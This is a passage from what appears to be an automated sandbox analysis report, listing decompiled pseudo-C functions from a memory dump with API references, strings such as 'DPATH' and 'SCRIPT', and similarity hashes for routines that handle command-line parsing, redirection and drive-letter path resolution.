						if(_t156 == 0x4ec) {
							L47:
							 *0x4a754004( *((intOrPtr*)(_t200 - 0x90)),  *((intOrPtr*)(_t200 - 0x94)), _t193);
							__eflags = _t156 - _t196;
							if(_t156 == _t196) {
								_push(_t193);
								_push(_t196);
								E4A736D44(_t157);
							}
							L49:
							_t93 =  *0x4a7540b4; // 0x0
							 *((intOrPtr*)(_t93 + 0x30)) = _t193;
							 *0x4a75400c( *((intOrPtr*)(_t200 - 0x90)));
							goto L44;
						}
						__eflags = _t156 - 0x312;
						if(_t156 != 0x312) {
							goto L49;
						}
						goto L47;
					}
					 *0x4a75400c( *((intOrPtr*)(_t200 - 0x90)));
					_t97 =  *0x4a7540b4; // 0x0
					__eflags =  *((intOrPtr*)(_t97 + 0x30)) - _t193;
					if( *((intOrPtr*)(_t97 + 0x30)) != _t193) {
						_t98 =  *0x4a754008( *((intOrPtr*)(_t97 + 0x30)));
						__eflags = _t98;
						if(_t98 != 0) {
							goto L11;
						}
						_t152 =  *0x4a7540b4; // 0x0
						CloseHandle( *(_t152 + 0x30));
						_t154 =  *0x4a7540b4; // 0x0
						 *((intOrPtr*)(_t154 + 0x30)) = _t193;
						goto L44;
					}
					L11:
					 *((intOrPtr*)(_t200 - 4)) = 0xfffffffe;
					 *0x4a754080 = 1;
					_t99 =  *0x4a7540b4; // 0x0
					 *((intOrPtr*)(_t99 + 8)) = _t193;
					_t100 =  *0x4a7540b4; // 0x0
					 *_t100 =  *((intOrPtr*)(_t200 - 0x94));
					_t81 =  *(_t200 + 0x10);
					_t157 =  *0x4a7540b4; // 0x0
					 *(_t157 + 4) =  *(_t200 + 0x10);
					__eflags =  *0x4a754081;
					if( *0x4a754081 == 0) {
						goto L1;
					} else {
						_t157 =  *(_t156 + 0x38);
						__eflags =  *( *(_t156 + 0x38)) - 0x3a;
						if( *( *(_t156 + 0x38)) != 0x3a) {
							goto L1;
						}
						_t149 =  *0x4a7540b4; // 0x0
						_t194 =  *((intOrPtr*)(_t149 + 0x110));
						E4A73185A( *_t149,  *((intOrPtr*)(_t149 + 4)),  *_t194);
						_t186 =  *0x4a7540b4; // 0x0
						 *((intOrPtr*)(_t186 + 8)) =  *((intOrPtr*)(_t194 + 8));
						_t193 = 0;
						__eflags = 0;
						L15:
						E4A73185A(_t196, 0x2000,  *(_t156 + 0x38));
						_t104 = _t196;
						_t34 = _t104 + 2; // 0x4a768642
						_t161 = _t34;
						do {
							_t187 =  *_t104;
							_t104 = _t104 + 2;
							__eflags = _t187 - _t193;
						} while (_t187 != _t193);
						_t193 = 0x4a768642 + (_t104 - _t161 >> 1) * 2;
						 *_t193 = 0;
						_t109 =  *(_t156 + 0x3c);
						_t156 = 0;
						__eflags = _t109;
						if(_t109 != 0) {
							__eflags = 0x2000;
							E4A73185A(_t193, 0x2000 - (_t193 - _t196 >> 1), _t109);
						}
						_t110 =  *0x4a7540b4; // 0x0
						E4A731911( *((intOrPtr*)(_t110 + 0xc)));
						_t112 = _t196;
						_t39 = _t112 + 2; // 0x4a768642
						_t188 = _t39;
						do {
							_t162 =  *_t112;
							_t112 = _t112 + 2;
							__eflags = _t162 - _t156;
						} while (_t162 != _t156);
						_t163 =  *0x4a7540b4; // 0x0
						 *(_t163 + 0x64) = _t112 - _t188 >> 1;
						_t116 = E4A7319D6(_t196);
						_t164 =  *0x4a7540b4; // 0x0
						 *((intOrPtr*)(_t164 + 0x3c)) = _t116;
						_t117 =  *0x4a7540b4; // 0x0
						__eflags =  *((intOrPtr*)(_t117 + 0x3c)) - _t156;
						if( *((intOrPtr*)(_t117 + 0x3c)) == _t156) {
							L4:
							L41:
							return E4A7313CA(_t156, _t193, _t196);
						}
						 *((intOrPtr*)(_t117 + 0x8c)) =  *((intOrPtr*)(_t117 + 0x3c));
						_t118 = 0x68;
						do {
							_t166 =  *0x4a7540b4; // 0x0
							 *((intOrPtr*)(_t118 + _t166 - 0x28)) = _t156;
							_t167 =  *0x4a7540b4; // 0x0
							 *((intOrPtr*)(_t118 + _t167)) = _t156;
							_t118 = _t118 + 4;
							__eflags = _t118 - 0x8c;
						} while (_t118 < 0x8c);
						__eflags =  *_t193 - _t156;
						if( *_t193 == _t156) {
							_t119 =  *0x4a7540b4; // 0x0
							 *((intOrPtr*)(_t119 + 0x38)) = _t156;
							_t120 =  *0x4a7540b4; // 0x0
							 *((intOrPtr*)(_t120 + 0x34)) = _t156;
							L40:
							_t121 =  *0x4a7540b4; // 0x0
							_t168 =  *0x4a754104; // 0x0
							 *((intOrPtr*)(_t121 + 0x10)) = _t168;
							__eflags = 0;
							goto L41;
						}
						_t124 = E4A7319D6(_t193);
						_t171 =  *0x4a7540b4; // 0x0
						 *((intOrPtr*)(_t171 + 0x34)) = _t124;
						_t125 =  *0x4a7540b4; // 0x0
						_t189 =  *((intOrPtr*)(_t125 + 0x34));
						__eflags = _t189 - _t156;
						if(_t189 == _t156) {
							goto L4;
						}
						_t172 = _t189;
						_t126 = _t189;
						_t193 = _t126 + 2;
						do {
							_t196 =  *_t126;
							_t126 = _t126 + 2;
							__eflags = _t196 - _t156;
						} while (_t196 != _t156);
						_t128 = _t126 - _t193;
						__eflags = _t128;
						_t130 = _t172 + (_t128 >> 1) * 2;
						while(1) {
							__eflags = _t130 - _t189;
							if(_t130 == _t189) {
								break;
							}
							_t55 = _t130 - 2; // 0x38
							_t183 = _t55;
							_t196 =  *_t183 & 0x0000ffff;
							__eflags = _t196 - 0x20;
							if(_t196 == 0x20) {
								L5:
								_t130 = _t183;
								continue;
							}
							__eflags = _t196 - 9;
							if(_t196 == 9) {
								goto L5;
							}
							break;
						}
						 *_t130 = 0;
						__eflags =  *0x4a754081; // 0x0
						if(__eflags == 0) {
							_t131 =  *0x4a7540b4; // 0x0
							_push( *0x4a77065c & 0x0000ffff);
							_push( *((intOrPtr*)(_t131 + 0x34)));
							while(1) {
								_t196 = E4A7318EB();
								__eflags = _t196 - _t156;
								if(_t196 == _t156) {
									goto L33;
								}
								_t199 = _t196 + 2;
								_t137 = towupper( *_t199 & 0x0000ffff);
								__eflags = _t137 - 0x51;
								if(_t137 == 0x51) {
									 *0x4a75408c = _t156;
									_t75 = _t199 - 2; // 0x0
									_t182 = _t75;
									_t138 = _t75;
									_t76 = _t138 + 2; // 0x2
									_t193 = _t76;
									do {
										_t191 =  *_t138;
										_t138 = _t138 + 2;
										__eflags = _t191 - _t156;
									} while (_t191 != _t156);
									_t196 =  &(_t199[1]);
									E4A73185A(_t182, (_t138 - _t193 >> 1) + 1,  &(_t199[1]));
									goto L33;
								}
								_push( *0x4a77065c & 0x0000ffff);
								_push(_t199);
							}
						}
						L33:
						_t134 =  *0x4a7540b4; // 0x0
						_t135 = E4A7322CA( *((intOrPtr*)(_t134 + 0x34)), _t156, _t156);
						__eflags =  *_t135 - _t156;
						if( *_t135 == _t156) {
							L39:
							_t175 =  *0x4a7540b4; // 0x0
							 *((intOrPtr*)(_t175 + 0x38)) = _t135;
							goto L40;
						}
						_t190 = 0x68;
						while(1) {
							__eflags = _t190 - 0x8c;
							if(_t190 >= 0x8c) {
								goto L39;
							}
							_t176 =  *0x4a7540b4; // 0x0
							 *((intOrPtr*)(_t190 + _t176 - 0x28)) = _t135;
							_t177 = _t135;
							_t59 = _t177 + 2; // 0x2
							_t193 = _t59;
							do {
								_t197 =  *_t177;
								_t177 = _t177 + 2;
								__eflags = _t197 - _t156;
							} while (_t197 != _t156);
							_t180 = _t177 - _t193 >> 1;
							_t196 =  *0x4a7540b4; // 0x0
							 *(_t190 + _t196) = _t180;
							_t135 = _t135 + 2 + _t180 * 2;
							_t190 = _t190 + 4;
							__eflags =  *_t135 - _t156;
							if( *_t135 != _t156) {
								continue;
							}
							goto L39;
						}
						goto L39;
					}
				}
				L1:
				_t101 =  *0x4a7540b4; // 0x0
				if(E4A732FAF(_t157,  *_t101, _t81, _t196) == 0) {
					goto L15;
				}
				goto L4;
			}

0x4a735c8c
0x4a735c91
0x4a735c96
0x4a735c9b
0x4a735c9e
0x4a735ca7
0x4a735cad
0x4a735cb7
0x4a735cc1
0x4a735cc3
0x4a735cd0
0x4a735cd8
0x4a735cde
0x4a735ce3
0x4a735ce6
0x4a735ced
0x4a735cf0
0x4a735cf5
0x4a735d02
0x4a735d04
0x4a735d07
0x4a735d0b
0x4a735d0d
0x4a735d12
0x4a735d1a
0x4a735d1a
0x4a735d0b
0x4a735d35
0x4a735d3b
0x4a735d3d
0x4a74458c
0x4a74458c
0x00000000
0x4a735d43
0x4a735d46
0x4a735d56
0x4a735d5c
0x4a735d5e
0x4a74459e
0x4a7445a0
0x4a7445a5
0x4a7445a7
0x4a7445b1
0x4a7445be
0x4a7445c4
0x4a7445c6
0x4a7445c8
0x4a7445c9
0x4a7445ca
0x4a7445d0
0x4a7445d1
0x4a7445d1
0x4a7445d6
0x4a7445df
0x00000000
0x4a7445df
0x4a7445a9
0x4a7445af
0x00000000
0x00000000
0x00000000
0x4a7445af
0x4a735d6a
0x4a735d70
0x4a735d75
0x4a735d78
0x4a744568
0x4a74456e
0x4a744570
0x00000000
0x00000000
0x4a744576
0x4a74457e
0x4a744584
0x4a744589
0x00000000
0x4a744589
0x4a735d7e
0x4a735d7e
0x4a735d85
0x4a735d8c
0x4a735d91
0x4a735d94
0x4a735d9f
0x4a735da1
0x4a735da4
0x4a735daa
0x4a735dad
0x4a735db4
0x00000000
0x4a735dba
0x4a735dba
0x4a735dbd
0x4a735dc1
0x00000000
0x00000000
0x4a735dc7
0x4a735dcc
0x4a735dd9
0x4a735de1
0x4a735de7
0x4a735dea
0x4a735dea
0x4a735dec
0x4a735df5
0x4a735dfa
0x4a735dfc
0x4a735dfc
0x4a735dff
0x4a735dff
0x4a735e03
0x4a735e04
0x4a735e04
0x4a735e0d
0x4a735e16
0x4a735e19
0x4a735e1c
0x4a735e1e
0x4a735e20
0x4a735e2e
0x4a735e32
0x4a735e32
0x4a735e37
0x4a735e3f
0x4a735e44
0x4a735e46
0x4a735e46
0x4a735e49
0x4a735e49
0x4a735e4d
0x4a735e4e
0x4a735e4e
0x4a735e57
0x4a735e5d
0x4a735e61
0x4a735e66
0x4a735e6c
0x4a735e6f
0x4a735e74
0x4a735e77
0x4a73564d
0x4a735f90
0x4a735f95
0x4a735f95
0x4a735e80
0x4a735e88
0x4a735e89
0x4a735e89
0x4a735e8f
0x4a735e93
0x4a735e99
0x4a735e9c
0x4a735e9f
0x4a735e9f
0x4a735ea6
0x4a735ea9
0x4a735638
0x4a73563d
0x4a735640
0x4a735645
0x4a735f80
0x4a735f80
0x4a735f85
0x4a735f8b
0x4a735f8e
0x00000000
0x4a735f8e
0x4a735ec1
0x4a735ec6
0x4a735ecc
0x4a735ecf
0x4a735ed4
0x4a735ed7
0x4a735ed9
0x00000000
0x00000000
0x4a735edf
0x4a735ee1
0x4a735ee3
0x4a735ee6
0x4a735ee6
0x4a735eea
0x4a735eeb
0x4a735eeb
0x4a735ef0
0x4a735ef0
0x4a735ef4
0x4a735ef7
0x4a735ef7
0x4a735ef9
0x00000000
0x00000000
0x4a735efb
0x4a735efb
0x4a735efe
0x4a735f01
0x4a735f05
0x4a735850
0x4a735850
0x00000000
0x4a735850
0x4a735f0b
0x4a735f0f
0x00000000
0x00000000
0x00000000
0x4a735f0f
0x4a735f17
0x4a735f1a
0x4a735f20
0x4a744631
0x4a744640
0x4a744641
0x4a744660
0x4a744665
0x4a744667
0x4a744669
0x00000000
0x00000000
0x4a744645
0x4a74464a
0x4a744651
0x4a744655
0x4a744671
0x4a744677
0x4a744677
0x4a74467a
0x4a74467c
0x4a74467c
0x4a74467f
0x4a74467f
0x4a744683
0x4a744684
0x4a744684
0x4a74468d
0x4a744694
0x00000000
0x4a744694
0x4a74465e
0x4a74465f
0x4a74465f
0x4a744660
0x4a735f26
0x4a735f28
0x4a735f30
0x4a735f35
0x4a735f38
0x4a735f77
0x4a735f77
0x4a735f7d
0x00000000
0x4a735f7d
0x4a735f3c
0x4a735f3d
0x4a735f3d
0x4a735f43
0x00000000
0x00000000
0x4a735f45
0x4a735f4b
0x4a735f4f
0x4a735f51
0x4a735f51
0x4a735f54
0x4a735f54
0x4a735f58
0x4a735f59
0x4a735f59
0x4a735f60
0x4a735f62
0x4a735f68
0x4a735f6b
0x4a735f6f
0x4a735f72
0x4a735f75
0x00000000
0x00000000
0x00000000
0x4a735f75
0x00000000
0x4a735f3d
0x4a735db4
0x4a7355c8
0x4a7355ca
0x4a7355d8
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 4A735CD0
wcsspn.MSVCRT ref: 4A735EB5

Strings

SCRIPT, xrefs: 4A735D20

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: memsetwcsspn
String ID: SCRIPT
API String ID: 3809306610-3967369404
Opcode ID: 677aff689a2ea82e2f0e2b54dec129f71642c58679e9622bcd5eb2b718dfbc2b
Instruction ID: 0eed83a258add827fbfe1e35059f4d47253182e6ef7e327e828853b2eafd888f
Opcode Fuzzy Hash: 677aff689a2ea82e2f0e2b54dec129f71642c58679e9622bcd5eb2b718dfbc2b
Instruction Fuzzy Hash: D3C1D2B1644521DFD7B0CF24C989EA97BFAFF49300F5240A9E909CBA52DB309E48DB54

Uniqueness

Uniqueness Score: -1.00%

Function 4A7347C7, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 229
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E4A7347C7(signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				short _v528;
				intOrPtr* _v532;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				intOrPtr* _t39;
				void* _t40;
				void* _t42;
				WCHAR* _t43;
				void* _t54;
				WCHAR* _t60;
				void* _t63;
				signed int _t65;
				void* _t70;
				intOrPtr* _t72;
				intOrPtr* _t73;
				void* _t77;
				intOrPtr* _t79;
				signed int _t83;
				short* _t84;
				signed int _t85;
				intOrPtr _t92;
				intOrPtr _t94;
				intOrPtr* _t96;
				void* _t98;
				intOrPtr _t100;
				intOrPtr* _t101;
				signed int _t102;

				_t37 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t37 ^ _t102;
				_t85 = _a4;
				_t100 =  *((intOrPtr*)(_t85 + 0x34));
				while(_t100 != 0) {
					_t93 =  *((intOrPtr*)(_t100 + 4));
					_t73 =  *((intOrPtr*)(_t100 + 4));
					_t5 = _t73 + 2; // 0x2
					_t98 = _t5;
					do {
						_t96 =  *_t73;
						_t73 = _t73 + 2;
					} while (_t96 != 0);
					_t77 = E4A732598(_t93, _t93);
					_t97 = (_t73 - _t98 >> 1) + 1;
					E4A73185A( *((intOrPtr*)(_t100 + 4)), (_t73 - _t98 >> 1) + 1, _t77);
					if( *((intOrPtr*)(_t100 + 8)) != 0) {
						L9:
						_t100 =  *((intOrPtr*)(_t100 + 0x14));
						continue;
					}
					_t96 =  *((intOrPtr*)(_t100 + 4));
					_t79 = _t96;
					_t9 = _t79 + 2; // 0x2
					_t97 = _t9;
					do {
						_t94 =  *_t79;
						_t79 = _t79 + 2;
					} while (_t94 != 0);
					_t83 = (_t79 - _t97 >> 1) - 1;
					if(_t83 > 1) {
						_t84 = _t96 + _t83 * 2;
						if( *_t84 == 0x3a) {
							 *_t84 = 0;
						}
					}
					goto L9;
				}
				_t101 = _a8;
				if(_t101 == 3) {
					_t39 =  *0x4a7540fc; // 0x0
					_v532 = _t39;
					L13:
					_t101 =  *((intOrPtr*)(_t85 + 0x34));
					if(_t101 == 0) {
						L29:
						_t40 = 0;
						L30:
						return E4A7313A9(_t40, _t85, _v8 ^ _t102, _t96, _t97, _t101);
					}
					_t85 = _t85 | 0xffffffff;
					do {
						if( *(_t101 + 8) != 0) {
							goto L28;
						}
						_t97 = __imp___get_osfhandle;
						_t42 =  *_t97( *_t101);
						_pop(_t88);
						if(_t42 == _t85) {
							L38:
							 *(_t101 + 8) = _t85;
							L21:
							_t43 =  *(_t101 + 4);
							if( *_t43 == 0x26) {
								_t88 = 0;
								_t43[2] = 0;
								if(E4A7346D3((( *(_t101 + 4))[1] & 0x0000ffff) - 0x30, (( *(_t101 + 4))[1] & 0x0000ffff) - 0x30,  *_t101) != _t85) {
									goto L28;
								}
								L41:
								E4A734738();
								E4A736D44(_t88, 0x2344, 1, E4A739A2C(E4A735104,  *_t101));
								L37:
								_t40 = 1;
								goto L30;
							}
							if( *((short*)(_t101 + 0x10)) == 0x3c) {
								_t97 = E4A7339EF(_t43, 0x8000);
								if(_t97 != _t85) {
									L25:
									_t53 =  *_t101;
									if(_t97 !=  *_t101) {
										_t54 = E4A7346D3(_t53, _t97, _t53);
										_push(_t97);
										if(_t54 == _t85) {
											E4A733AB3();
											goto L41;
										}
										E4A733AB3();
										_t97 =  *_t101;
									}
									if(_t97 == _t85) {
										L36:
										E4A734738();
										E4A74056B( *0x4a754128);
										goto L37;
									}
									 *((intOrPtr*)(_v532 + 4)) = _t97;
									goto L28;
								}
								_t60 = E4A73321B(_t88, L"DPATH");
								if(_t60 == 0) {
									goto L36;
								}
								_t88 =  &_v528;
								if(SearchPathW(_t60,  *(_t101 + 4), 0, 0x104,  &_v528, 0) == 0) {
									goto L36;
								}
								_push(0x8000);
								_t43 =  &_v528;
								L24:
								_push(_t43);
								_t97 = E4A7339EF();
								if(_t97 == _t85) {
									goto L36;
								}
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t88 = ( ~( *(_t101 + 0xc)) & 0xfffffe09) + 0x301;
							_push(( ~( *(_t101 + 0xc)) & 0xfffffe09) + 0x301);
							goto L24;
						}
						_t63 =  *_t97( *_t101);
						_pop(_t88);
						if(_t63 == 0xfffffffe) {
							goto L38;
						}
						if(E4A733B03(_t63, _t88,  *_t101) == 0) {
							_t64 = E4A736BEA(_t64,  *_t101);
							if(_t64 != 0) {
								goto L19;
							}
							_t70 =  *_t97( *_t101, _t64, _t64, 1);
							_pop(_t88);
							if(SetFilePointer(_t70, ??, ??, ??) != _t85) {
								goto L19;
							}
							_push(E4A739A2C(E4A735104,  *_t101));
							_push(1);
							_push(0x40002721);
							L50:
							E4A736D44(_t88);
							 *(_t101 + 8) =  *(_t101 + 8) & 0x00000000;
							E4A734738();
							goto L37;
						}
						L19:
						_t65 = E4A734794(_t64,  *_t101);
						_push( *_t101);
						 *(_t101 + 8) = _t65;
						if(_t65 == _t85) {
							_push(E4A735104);
							_push(E4A739A2C());
							_push(1);
							_push(0x2344);
							goto L50;
						}
						E4A733AB3();
						goto L21;
						L28:
						_t101 =  *((intOrPtr*)(_t101 + 0x14));
					} while (_t101 != 0);
					goto L29;
				}
				_t72 = E4A731896(0x10);
				_v532 = _t72;
				if(_t72 == 0) {
					goto L37;
				}
				_t92 =  *0x4a7540fc; // 0x0
				 *((intOrPtr*)(_t72 + 0xc)) = _t92;
				 *0x4a7540fc = _t72;
				 *(_t72 + 8) = _t85;
				 *_t72 = _t101;
				goto L13;
			}

0x4a7347d2
0x4a7347d9
0x4a7347dd
0x4a7347e1
0x4a7347e5
0x4a7347e9
0x4a7347ec
0x4a7347ee
0x4a7347ee
0x4a7347f1
0x4a7347f1
0x4a7347f5
0x4a7347f6
0x4a734802
0x4a734808
0x4a73480d
0x4a734816
0x4a734841
0x4a734841
0x00000000
0x4a734841
0x4a734818
0x4a73481b
0x4a73481d
0x4a73481d
0x4a734820
0x4a734820
0x4a734824
0x4a734825
0x4a73482e
0x4a734832
0x4a734834
0x4a73483b
0x4a747046
0x4a747046
0x4a73483b
0x00000000
0x4a734832
0x4a734846
0x4a73484c
0x4a74704e
0x4a747053
0x4a73487a
0x4a73487a
0x4a73487f
0x4a73493d
0x4a73493d
0x4a73493f
0x4a73494d
0x4a73494d
0x4a734885
0x4a734888
0x4a73488c
0x00000000
0x00000000
0x4a734894
0x4a73489a
0x4a73489c
0x4a73489f
0x4a7405ca
0x4a7405ca
0x4a7348db
0x4a7348db
0x4a7348e2
0x4a73641d
0x4a73641f
0x4a736437
0x00000000
0x00000000
0x4a74705e
0x4a74705e
0x4a747077
0x4a7405c2
0x4a7405c4
0x00000000
0x4a7405c4
0x4a7348ed
0x4a74708f
0x4a747093
0x4a734917
0x4a734917
0x4a73491b
0x4a7470df
0x4a7470e4
0x4a7470e7
0x4a747133
0x00000000
0x4a747133
0x4a7470e9
0x4a7470ee
0x4a7470ee
0x4a734923
0x4a7405b2
0x4a7405b2
0x4a7405bd
0x00000000
0x4a7405bd
0x4a73492f
0x00000000
0x4a73492f
0x4a74709e
0x4a7470a5
0x00000000
0x00000000
0x4a7470ad
0x4a7470c7
0x00000000
0x00000000
0x4a7470cd
0x4a7470d2
0x4a734907
0x4a734907
0x4a73490d
0x4a734911
0x00000000
0x00000000
0x00000000
0x4a734911
0x4a7348f8
0x4a734900
0x4a734906
0x00000000
0x4a734906
0x4a7348a7
0x4a7348a9
0x4a7348ad
0x00000000
0x00000000
0x4a7348bc
0x4a736c1c
0x4a736c23
0x00000000
0x00000000
0x4a736c2f
0x4a736c31
0x4a736c3b
0x00000000
0x00000000
0x4a747101
0x4a747102
0x4a747104
0x4a74711d
0x4a74711d
0x4a747122
0x4a747129
0x00000000
0x4a747129
0x4a7348c2
0x4a7348c4
0x4a7348c9
0x4a7348cb
0x4a7348d0
0x4a74710b
0x4a747115
0x4a747116
0x4a747118
0x00000000
0x4a747118
0x4a7348d6
0x00000000
0x4a734932
0x4a734932
0x4a734935
0x00000000
0x4a734888
0x4a734854
0x4a734859
0x4a734861
0x00000000
0x00000000
0x4a734867
0x4a73486d
0x4a734870
0x4a734875
0x4a734878
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 4A73489A
_get_osfhandle.MSVCRT ref: 4A7348A7

Strings

DPATH, xrefs: 4A747099

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: _get_osfhandle
String ID: DPATH
API String ID: 210771365-2010427443
Opcode ID: 4b3602d7b0755a5c6863620aea1be0c7cab2a6da28b77e638cbc66fd8874d8f9
Instruction ID: e4842b329dded8941b3d16a4abd2fc1436716086a41e51c65f33c17739b189aa
Opcode Fuzzy Hash: 4b3602d7b0755a5c6863620aea1be0c7cab2a6da28b77e638cbc66fd8874d8f9
Instruction Fuzzy Hash: C271137165CA01AEDB749FA0C888AA67FF9EB40311F134568E582DB193DBB1D948CB60

Uniqueness

Uniqueness Score: -1.00%

Function 4A73BF22, Relevance: 10.7, APIs: 7, Instructions: 213
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E4A73BF22(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				WCHAR* _t44;
				void* _t48;
				void* _t49;
				void* _t55;
				long _t58;
				WCHAR* _t61;
				wchar_t* _t67;
				signed char _t68;
				long _t70;
				short _t74;
				long _t80;
				long _t82;
				wchar_t* _t88;
				wchar_t* _t93;
				short _t96;
				short _t99;
				signed int _t105;
				signed short* _t110;
				WCHAR* _t113;
				void* _t114;
				intOrPtr _t116;
				void* _t117;
				void* _t123;
				void* _t125;
				void* _t128;

				_push(0x44);
				_push(0x4a73c018);
				E4A7313E1(__ebx, __edi, __esi);
				_t116 =  *0x4a754081; // 0x0
				_t88 = 0;
				_t113 = E4A7322CA( *((intOrPtr*)( *((intOrPtr*)(_t114 + 8)) + 0x3c)), 0, 0 | _t116 != 0x00000000);
				 *(_t114 - 0x30) = _t113;
				_t117 =  *0x4a754081 - _t88; // 0x0
				if(_t117 == 0) {
					L4:
					_t44 = _t113;
					_t6 =  &(_t44[1]); // 0x2
					_t105 = _t6;
					do {
						_t93 =  *_t44;
						_t44 =  &(_t44[1]);
					} while (_t93 != _t88);
					_t48 = E4A732598(_t93, _t113);
					_t108 = (_t44 - _t105 >> 1) + 1;
					_t49 = E4A73185A(_t113, (_t44 - _t105 >> 1) + 1, _t48);
					 *0x4a754188 = _t88;
					if( *_t113 == _t88) {
						E4A74F174(_t49);
						L15:
						return E4A7313CA(_t88, _t108, _t113);
					}
					if(E4A73C039(_t93) == 0) {
						_push(_t88);
						_push(0x40002728);
						L41:
						E4A736D44(_t93);
						 *0x4a754188 = 1;
						goto L15;
					}
					_t123 =  *0x4a754081 - _t88; // 0x0
					if(_t123 == 0 ||  *_t113 != 0x5c) {
						L10:
						_t108 = 0;
						_t125 =  *0x4a754188 - _t108; // 0x0
						if(_t125 != 0) {
							L39:
							_t55 = E4A7372A1(__eflags);
							HeapFree(GetProcessHeap(), _t108, _t55);
							_push(_t108);
							_push( *0x4a754188);
							goto L41;
						}
						_t58 = E4A736C78(_t113, 1);
						 *0x4a754188 = _t58;
						if(_t58 == 0 && _t113[1] == 0x3a) {
							E4A732C56(_t88, _t105, 0, 0x4a755260, 0x104,  *_t113 & 0x0000ffff);
						}
						_t128 =  *0x4a754188 - _t108; // 0x0
						if(_t128 != 0) {
							goto L39;
						}
						goto L15;
					} else {
						__eflags = _t113[1] - 0x5c;
						if(__eflags != 0) {
							goto L10;
						}
						_t61 = _t113;
						_t9 =  &(_t61[1]); // 0x2
						_t105 = _t9;
						do {
							_t96 =  *_t61;
							_t61 =  &(_t61[1]);
							__eflags = _t96 - _t88;
						} while (_t96 != _t88);
						 *((intOrPtr*)(_t114 - 0x2c)) = (_t61 - _t105 >> 1) + 1;
						_t11 =  &(_t113[2]); // 0x4
						_t67 = wcschr(_t11, 0x5c);
						_t88 = _t67;
						 *(_t114 - 0x28) = _t67;
						__eflags = _t88;
						if(_t88 != 0) {
							_t88 = wcschr( &(_t88[0]), 0x5c);
							 *(_t114 - 0x28) = _t88;
							__eflags = _t88;
							if(_t88 != 0) {
								_t80 = GetFileAttributesW(_t113);
								__eflags = _t80 - 0xffffffff;
								if(_t80 != 0xffffffff) {
									 *_t88 = 0;
									_t88 =  &(_t88[0]);
									__eflags = _t88;
									 *(_t114 - 0x28) = _t88;
								} else {
									_t82 = GetLastError();
									 *0x4a754188 = _t82;
									__eflags = _t82 - 2;
									if(_t82 == 2) {
										 *0x4a754188 = 3;
									}
								}
							}
						}
						_t68 = 0x5a;
						 *(_t114 - 0x24) = _t68;
						_t99 = 0x3a;
						 *((short*)(_t114 - 0x22)) = _t99;
						 *((short*)(_t114 - 0x20)) = 0;
						 *(_t114 - 0x50) = 1;
						 *((intOrPtr*)(_t114 - 0x44)) = _t114 - 0x24;
						 *(_t114 - 0x40) = _t113;
						 *(_t114 - 0x38) =  *(_t114 - 0x38) & 0x00000000;
						_t93 =  *0x4a754188; // 0x0
						while(1) {
							__eflags = _t93;
							if(__eflags != 0) {
								goto L10;
							}
							__eflags = _t68 - 0x41;
							if(__eflags == 0) {
								goto L10;
							}
							 *((intOrPtr*)(_t114 - 4)) = 0;
							_push(0);
							_push(0);
							_push(0);
							_t70 = _t114 - 0x54;
							_push(_t70);
							L4A7524E9();
							 *0x4a754188 = _t70;
							 *((intOrPtr*)(_t114 - 4)) = 0xfffffffe;
							_t93 =  *0x4a754188; // 0x0
							__eflags = _t93;
							if(_t93 == 0) {
								_t93 =  *0x4a754114; // 0x0
								_t105 =  *0x4a754118; // 0x0
								 *((short*)(_t93 + _t105 * 8 - 4)) =  *(_t114 - 0x24);
								 *_t113 =  *(_t114 - 0x24);
								_t113[1] =  *((intOrPtr*)(_t114 - 0x22));
								_t74 = 0x5c;
								_t113[2] = _t74;
								__eflags = _t88;
								if(__eflags == 0) {
									_t113[3] = 0;
								} else {
									_t39 =  &(_t113[3]); // 0x6
									E4A73185A(_t39,  *((intOrPtr*)(_t114 - 0x2c)), _t88);
								}
								goto L10;
							} else {
								__eflags = _t93 - 0x55;
								if(_t93 == 0x55) {
									L35:
									_t68 = ( *(_t114 - 0x24) & 0x000000ff) - 1;
									 *(_t114 - 0x24) = _t68;
									_t93 = 0;
									 *0x4a754188 = 0;
									continue;
								}
								__eflags = _t93 - 0x4b2;
								if(_t93 != 0x4b2) {
									_t68 =  *(_t114 - 0x24);
									continue;
								}
								goto L35;
							}
						}
						goto L10;
					}
				} else {
					_t110 = E4A732ED1(_t113);
					while(_t110 > _t113 && iswspace( *_t110 & 0x0000ffff) != 0) {
						 *_t110 = 0;
						_t110 = _t110;
					}
					goto L4;
				}
			}

0x4a73bf22
0x4a73bf24
0x4a73bf29
0x4a73bf33
0x4a73bf3d
0x4a73bf48
0x4a73bf4a
0x4a73bf4d
0x4a73bf53
0x4a73bf74
0x4a73bf74
0x4a73bf76
0x4a73bf76
0x4a73bf79
0x4a73bf79
0x4a73bf7d
0x4a73bf7e
0x4a73bf8a
0x4a73bf90
0x4a73bf93
0x4a73bf98
0x4a73bfa1
0x4a7481f3
0x4a73c00b
0x4a73c015
0x4a73c015
0x4a73bfae
0x4a74839a
0x4a74839b
0x4a7483a0
0x4a7483a0
0x4a7483a6
0x00000000
0x4a7483b0
0x4a73bfb4
0x4a73bfba
0x4a73bfc6
0x4a73bfc6
0x4a73bfc8
0x4a73bfce
0x4a74837d
0x4a74837d
0x4a74838b
0x4a748391
0x4a748392
0x00000000
0x4a748392
0x4a73bfd7
0x4a73bfdc
0x4a73bfe3
0x4a73bffa
0x4a73bffa
0x4a73bfff
0x4a73c005
0x00000000
0x00000000
0x00000000
0x4a7481fd
0x4a7481fd
0x4a748202
0x00000000
0x00000000
0x4a748208
0x4a74820a
0x4a74820a
0x4a74820d
0x4a74820d
0x4a748211
0x4a748212
0x4a748212
0x4a74821c
0x4a748221
0x4a74822b
0x4a74822f
0x4a748231
0x4a748234
0x4a748236
0x4a748242
0x4a748244
0x4a748247
0x4a748249
